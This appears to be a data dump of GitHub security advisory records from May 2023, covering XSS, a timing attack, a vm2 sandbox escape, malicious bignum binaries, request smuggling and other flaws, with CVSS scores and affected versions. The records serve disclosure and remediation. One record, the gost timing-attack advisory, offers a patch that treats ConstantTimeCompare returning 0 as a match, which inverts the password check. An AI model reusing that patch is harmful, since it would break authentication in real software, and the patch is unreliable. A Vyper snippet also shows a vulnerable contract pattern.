{'cwe_ids': ['CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T02:59:30Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-vppq-6ff8-2m8w
|
2023-05-24T17:08:58Z
|
2023-05-17T09:30:16Z
| null |
['CVE-2023-2753']
|
phpMyFAQ vulnerable to stored Cross-site Scripting
|
Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.2.0-beta.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.0-beta'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2753'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/5401ab75d022932b8d5d7adaa771acf44fed18ba'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpmyfaq'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/eca2284d-e81a-4ab8-91bb-7afeca557628'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T17:04:44Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-qjrq-hm79-49ww
|
2023-05-30T06:42:29Z
|
2023-05-22T19:47:15Z
| null |
['CVE-2023-32691']
|
ginuerzh/gost vulnerable to Timing Attack
|
[Timing attacks](https://en.wikipedia.org/wiki/Timing_attack) occur when an attacker can guess a secret by observing a difference in processing time for valid and invalid inputs. Sensitive secrets such as passwords, token and API keys should be compared only using a constant-time comparision function.
More information on this attack type can be found in [this blog post](https://verboselogging.com/2012/08/20/a-timing-attack-in-action).
# Root Cause Analysis
In this case, the vulnerability occurs due to the following code.
https://github.com/ginuerzh/gost/blob/1c62376e0880e4094bd3731e06bd4f7842638f6a/auth.go#L46-L46
Here, a untrusted input, sourced from a HTTP header, is compared directly with a secret.
Since, this comparision is not secure, an attacker can mount a side-channel timing attack to guess the password.
# Remediation
This can be easily fixed using a constant time comparing function such as `crypto/subtle`'s `ConstantTimeCompare`.
An example fix can be found in https://github.com/runatlantis/atlantis/commit/48870911974adddaa4c99c8089e79b7d787fa820 Alternatively, one can apply the patch below
```
From d18cff85e1a565f688f717fd8f2cacea62ff9dbf Mon Sep 17 00:00:00 2001
From: Porcupiney Hairs <porcupiney.hairs@protonmail.com>
Date: Sun, 7 May 2023 01:03:33 +0530
Subject: [PATCH] Fix : Timing attack
---
auth.go | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/auth.go b/auth.go
index 1be96e9..be13f23 100644
--- a/auth.go
+++ b/auth.go
@@ -2,6 +2,7 @@ package gost
import (
"bufio"
+ "crypto/subtle"
"io"
"strings"
"sync"
@@ -43,7 +44,8 @@ func (au *LocalAuthenticator) Authenticate(user, password string) bool {
}
v, ok := au.kvs[user]
- return ok && (v == "" || password == v)
+ passOk := subtle.ConstantTimeCompare([]byte(password), []byte(v)) == 0
+ return ok && (v == "" || passOk)
}
// Add adds a key-value pair to the Authenticator.
--
2.25.1
```
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/ginuerzh/gost'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.11.5'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/ginuerzh/gost/security/advisories/GHSA-qjrq-hm79-49ww'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32691'}, {'type': 'PACKAGE', 'url': 'https://github.com/ginuerzh/gost'}, {'type': 'WEB', 'url': 'https://github.com/ginuerzh/gost/blob/1c62376e0880e4094bd3731e06bd4f7842638f6a/auth.go#L46'}]
|
{'cwe_ids': ['CWE-203'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-22T19:47:15Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-vxmm-cwh2-q762
|
2023-05-22T20:35:46Z
|
2023-05-22T20:35:46Z
| null |
['CVE-2023-32675']
|
Vyper's nonpayable default functions are sometimes payable
|
### Impact
in contracts with at least one regular nonpayable function, due to the callvalue check being inside of the selector section, it is possible to send funds to the default function by using less than 4 bytes of calldata, even if the default function is marked `nonpayable`. this applies to contracts compiled with vyper<=0.3.7.
```vyper
# @version 0.3.7
# implicitly nonpayable
@external
def foo() -> uint256:
return 1
# implicitly nonpayable
@external
def __default__():
# could receive ether here
pass
```
### Patches
this was fixed by the removal of the global calldatasize check in https://github.com/vyperlang/vyper/commit/02339dfda0f3caabad142060d511d10bfe93c520.
### Workarounds
don't use nonpayable default functions
### References
_Are there any links users can visit to find out more?_
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'vyper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.8'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/security/advisories/GHSA-vxmm-cwh2-q762'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32675'}, {'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/commit/02339dfda0f3caabad142060d511d10bfe93c520'}, {'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/commit/903727006c1e5ebef99fa9fd5d51d62bd33d72a9'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/vyper/PYSEC-2023-80.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/vyperlang/vyper'}]
|
{'cwe_ids': ['CWE-670'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-05-22T20:35:46Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-282v-666c-3fvg
|
2023-06-12T21:26:02Z
|
2023-05-18T18:30:35Z
| null |
['CVE-2023-2800']
|
transformers has Insecure Temporary File
|
Insecure Temporary File in GitHub repository huggingface/transformers 4.29.2 and prior. A fix is available at commit 80ca92470938bbcc348e2d9cf4734c7c25cb1c43 and has been released as part of version 4.30.0.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'transformers'}, 'ecosystem_specific': {'affected_functions': ['transformers.utils.hub.download_url']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.30.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2800'}, {'type': 'WEB', 'url': 'https://github.com/huggingface/transformers/pull/23372'}, {'type': 'WEB', 'url': 'https://github.com/huggingface/transformers/commit/80ca92470938bbcc348e2d9cf4734c7c25cb1c43'}, {'type': 'PACKAGE', 'url': 'https://github.com/huggingface/transformers'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/a3867b4e-6701-4418-8c20-3c6e7084a44a'}]
|
{'cwe_ids': ['CWE-377'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-19T13:27:42Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-pmmr-r9v2-59p8
|
2023-05-17T03:26:11Z
|
2023-05-16T18:30:16Z
| null |
['CVE-2023-32987']
|
Jenkins Reverse Proxy Auth Plugin cross-site request forgery vulnerability
|
Jenkins Reverse Proxy Auth Plugin 1.7.4 and earlier does not require POST requests for a form validation method, resulting in a cross-site request forgery (CSRF) vulnerability.
This vulnerability allows attackers to connect to an attacker-specified LDAP server using attacker-specified credentials.
Reverse Proxy Auth Plugin 1.7.5 requires POST requests for the affected form validation method.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:reverse-proxy-auth-plugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.5'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32987'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-3002'}]
|
{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T03:26:11Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-22gj-8qj2-fj46
|
2023-05-11T14:01:43Z
|
2023-05-02T21:31:48Z
| null |
['CVE-2023-30943']
|
Moodle External Control of File Name or Path vulnerability
|
The vulnerability was found Moodle which exists because the application allows a user to control path of the older to create in TinyMCE loaders. A remote user can send a specially crafted HTTP request and create arbitrary folders on the system.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.0-rc2'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30943'}, {'type': 'WEB', 'url': 'https://github.com/moodle/moodle/commit/59d42e1ed23f916dcb47d53c745bef18a116d800'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2188605'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/54TM5H5PDUDYXOQ7X7PPYWP4AJDAE73I/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MZBWRVUJF7HI53XCJPJ3YJZPOV5HBRUY/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PBFSXRYLT4ICKJVQSRBAOUDMDRVSVBLS/'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=446285'}, {'type': 'WEB', 'url': 'http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-77718'}]
|
{'cwe_ids': ['CWE-610', 'CWE-73'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-02T23:13:25Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-fjx5-xm7q-whvj
|
2023-05-22T21:30:15Z
|
2023-05-12T12:30:19Z
| null |
['CVE-2023-30130']
|
CraftCMS allows remote attacker to execute arbitrary code via crafted script to Section parameter
|
An issue found in CraftCMS v.3.8.1 allows a remote attacker to execute arbitrary code via a crafted script to the Section parameter.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'craftcms/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.8.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30130'}, {'type': 'WEB', 'url': 'https://craftcms.com/'}, {'type': 'PACKAGE', 'url': 'https://github.com/craftcms/cms'}, {'type': 'WEB', 'url': 'https://tf1t.gitbook.io/mycve/craftcms/server-site-template-injection-on-craftcms-3.8.1'}]
|
{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-12T20:14:07Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-g8xc-6mf7-h28h
|
2023-05-09T21:25:06Z
|
2023-05-09T21:25:06Z
| null |
['CVE-2023-31141']
|
OpenSearch issue with fine-grained access control during extremely rare race conditions
|
### Impact
There is an issue with the implementation of fine-grained access control rules (document-level security, field-level security and field masking) where they are not correctly applied to the queries during extremely rare race conditions potentially leading to incorrect access authorization. For this issue to be triggered, two concurrent requests need to land on the same instance exactly when query cache eviction happens, once every four hours.
### Affected versions
OpenSearch 1.0.0-1.3.9 and 2.0.0-2.6.0
### Patched versions
OpenSearch 1.3.10 and 2.7.0
### For more information
If you have any questions or comments about this advisory, please contact AWS/Amazon Security via our issue reporting page (https://aws.amazon.com/security/vulnerability-reporting/) or directly via email to aws-security@amazon.com. Please do not create a public GitHub issue.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.opensearch.plugin:opensearch-security'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.3.10.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.opensearch.plugin:opensearch-security'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.7.0.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/opensearch-project/security/security/advisories/GHSA-g8xc-6mf7-h28h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31141'}, {'type': 'PACKAGE', 'url': 'https://github.com/opensearch-project/security'}]
|
{'cwe_ids': ['CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-09T21:25:06Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-9chv-3w6c-jq9w
|
2023-05-11T14:05:25Z
|
2023-05-03T21:30:18Z
| null |
['CVE-2023-25827']
|
Cross Site Scripting in OpenTSDB
|
Due to insufficient validation of parameters reflected in error messages by the legacy HTTP query API and the logging endpoint, it is possible to inject and execute malicious JavaScript within the browser of a targeted OpenTSDB user. This issue shares the same root cause as CVE-2018-13003, a reflected XSS vulnerability with the suggestion endpoint.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'net.opentsdb:opentsdb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.4.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25827'}, {'type': 'WEB', 'url': 'https://github.com/OpenTSDB/opentsdb/pull/2274'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenTSDB/opentsdb'}, {'type': 'WEB', 'url': 'https://www.synopsys.com/blogs/software-security/opentsdb/'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-05T02:24:23Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-g947-422m-hr7p
|
2023-05-10T21:18:29Z
|
2023-05-10T06:30:27Z
|
2023-05-10T21:18:29Z
|
[]
|
Duplicate Advisory: Pimcore Cross-site Scripting (XSS) in Static Routes name field
|
## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-mhpj-7m7h-8p6x. This link is maintained to preserve external references.
## Original Description
Cross-site Scripting (XSS) - Generic in GitHub repository pimcore/pimcore prior to 10.5.21.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.21'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2616'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/07a2c95be524c7e20105cef58c5767d4ebb06091'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/564cb512-2bcc-4458-8c20-88110ab45801'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-10T21:18:29Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-6gf5-c898-7rxp
|
2023-05-11T20:37:30Z
|
2023-05-11T20:37:30Z
| null |
['CVE-2023-32070']
|
Improper Neutralization of Script in Attributes in XWiki (X)HTML renderers
|
### Impact
HTML rendering didn't check for dangerous attributes/attribute values. This allowed cross-site scripting (XSS) attacks via attributes and link URLs, e.g., supported in XWiki syntax.
### Patches
This has been patched in XWiki 14.6 RC1.
### Workarounds
There are no known workarounds apart from upgrading to a fixed version.
### References
* https://github.com/xwiki/xwiki-rendering/commit/c40e2f5f9482ec6c3e71dbf1fff5ba8a5e44cdc1
* https://jira.xwiki.org/browse/XRENDERING-663
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:security@xwiki.org)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.rendering:xwiki-rendering-syntax-xhtml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '14.6-rc-1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-core-rendering-api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.0-milestone-2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.rendering:xwiki-rendering-syntax-html'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '14.6-rc-1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.rendering:xwiki-rendering-syntax-html5'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '14.6-rc-1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.rendering:xwiki-rendering-syntax-annotatedxhtml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '14.6-rc-1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.rendering:xwiki-rendering-syntax-annotatedhtml5'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '14.6-rc-1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-annotation-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '14.6-rc-1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-rendering/security/advisories/GHSA-6gf5-c898-7rxp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32070'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-rendering/commit/c40e2f5f9482ec6c3e71dbf1fff5ba8a5e44cdc1'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-rendering'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XRENDERING-663'}]
|
{'cwe_ids': ['CWE-79', 'CWE-83'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-05-11T20:37:30Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-q63q-hwf6-3mw6
|
2023-05-24T15:23:45Z
|
2023-05-05T00:30:19Z
| null |
['CVE-2023-30093']
|
ONOS vulnerable to Cross-site Scripting
|
A cross-site scripting (XSS) vulnerability in Open Network Operating System (ONOS) from version v1.9.0 to v2.7.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the authorizationURL parameter of the API documentation dashboard under securityDefinitions > OAuth2 > authorizationURL.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.onosproject:onos-archetypes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9.0'}, {'last_affected': '2.7.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30093'}, {'type': 'PACKAGE', 'url': 'https://github.com/opennetworkinglab/onos'}, {'type': 'WEB', 'url': 'https://www.edoardoottavianelli.it/CVE-2023-30093/'}, {'type': 'WEB', 'url': 'https://www.youtube.com/watch?v=jZr2JhDd_S8'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-24T15:10:38Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-7cgc-fjv4-52x6
|
2023-05-24T16:43:58Z
|
2023-05-24T16:43:58Z
| null |
[]
|
Malware in pre-build binaries of bignum
|
### Impact
bignum releases from v0.12.2 to v0.13.0 (inclusive) used node-pre-gyp to optionally download pre-built binary versions of the addon. These binaries were published on a now-expired S3 bucket which has since been claimed by a malicious third party which is now serving binaries containing malware that exfiltrates data from the user's computer.
### Patches
v0.13.1 does not use node-pre-gyp and does not have support for downloading pre-built binaries in any form, avoiding the risk of malicious downloads.
|
[]
|
[{'package': {'ecosystem': 'npm', 'name': 'bignum'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.12.2'}, {'fixed': '0.13.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/justmoon/node-bignum/security/advisories/GHSA-7cgc-fjv4-52x6'}, {'type': 'WEB', 'url': 'https://github.com/justmoon/node-bignum/commit/57e48c3f052249725517415d83c7147e4a8c44c8'}, {'type': 'WEB', 'url': 'https://github.com/justmoon/node-bignum/commit/72951c53e7c5c1ac157f04686dc12c3c393b4b08'}, {'type': 'PACKAGE', 'url': 'https://github.com/justmoon/node-bignum'}]
|
{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-05-24T16:43:58Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-v3fv-v9m6-26g3
|
2023-05-17T03:36:48Z
|
2023-05-16T18:30:16Z
| null |
['CVE-2023-33001']
|
Jenkins HashiCorp Vault Plugin has improper masking of credentials
|
Jenkins HashiCorp Vault Plugin 360.v0a_1c04cf807d and earlier does not properly mask (i.e., replace with asterisks) credentials printed in the build log from Pipeline steps like `sh` and `bat`, when both of the following conditions are met:
- The credentials are printed in build steps executing on an agent (typically inside a `node` block).
- Push mode for durable task logging is enabled. This is a hidden option in Pipeline: Nodes and Processes that can be enabled through the Java system property `org.jenkinsci.plugins.workflow.steps.durable_task.DurableTaskStep.USE_WATCHING`. It is also automatically enabled by some plugins, e.g., OpenTelemetry and Pipeline Logging over CloudWatch.
An improvement in Credentials Binding 523.525.vb_72269281873 implements a workaround that applies build log masking even in affected plugins. This workaround is temporary and potentially incomplete, so it is still recommended that affected plugins be updated to resolve this issue.
As of publication of this advisory, there is no fix.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.datapipe.jenkins.plugins:hashicorp-vault-plugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '360.v0a'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33001'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-3077'}]
|
{'cwe_ids': ['CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T03:36:48Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-863x-868h-968x
|
2023-06-02T23:35:19Z
|
2023-05-24T18:30:26Z
| null |
['CVE-2021-25748']
|
Ingress-nginx `path` sanitization can be bypassed with newline character
|
A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use a newline character to bypass the sanitization of the `spec.rules[].http.paths[].path` field of an Ingress object (in the `networking.k8s.io` or `extensions` API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'k8s.io/ingress-nginx'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25748'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/ingress-nginx/issues/8686'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/ingress-nginx/pull/8623'}, {'type': 'PACKAGE', 'url': 'https://github.com/kubernetes/ingress-nginx'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/ingress-nginx/releases/tag/controller-v1.2.1'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/kubernetes-security-announce/c/avaRYa9c7I8'}]
|
{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-24T21:55:34Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-whpj-8f3w-67p5
|
2023-05-15T20:50:51Z
|
2023-05-15T20:50:51Z
| null |
['CVE-2023-32314']
|
vm2 Sandbox Escape vulnerability
|
A sandbox escape vulnerability exists in vm2 for versions up to 3.9.17. It abuses an unexpected creation of a host object based on the specification of `Proxy`.
### Impact
A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox.
### Patches
This vulnerability was patched in the release of version `3.9.18` of `vm2`.
### Workarounds
None.
### References
PoC - https://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5ac
### For more information
If you have any questions or comments about this advisory:
- Open an issue in [VM2](https://github.com/patriksimek/vm2)
Thanks to @arkark (Takeshi Kaneko) of GMO Cybersecurity by Ierae, Inc. for disclosing this vulnerability.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'vm2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.9.18'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/patriksimek/vm2/security/advisories/GHSA-whpj-8f3w-67p5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32314'}, {'type': 'WEB', 'url': 'https://github.com/patriksimek/vm2/commit/d88105f99752305c5b8a77b63ddee3ec86912daf'}, {'type': 'WEB', 'url': 'https://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5ac'}, {'type': 'PACKAGE', 'url': 'https://github.com/patriksimek/vm2'}, {'type': 'WEB', 'url': 'https://github.com/patriksimek/vm2/releases/tag/3.9.18'}]
|
{'cwe_ids': ['CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-05-15T20:50:51Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-mgc4-wqv7-4pxm
|
2023-05-18T17:29:43Z
|
2023-05-18T17:29:43Z
| null |
[]
|
SwiftNIO vulnerable to HTTP request smuggling using malformed Transfer-Encoding header
|
### Impact
Affected SwiftNIO systems are vulnerable to request smuggling attacks, in which they parse a given HTTP message differently from other network parties, potentially seeing a different number of requests than other servers. This can lead to failures of authentication, routing, and other issues.
This vulnerability can be found in the bundled copy of the Node.JS HTTP parser used in the `NIOHTTP1` module.
### Workarounds
No workaround is available, users must upgrade.
### References
https://nodejs.org/en/blog/vulnerability/february-2020-security-releases/#http-request-smuggling-using-malformed-transfer-encoding-header-critical-cve-2019-15605
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/apple/swift-nio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.14.2'}]}]}, {'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/apple/swift-nio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.13.1'}]}]}]
|
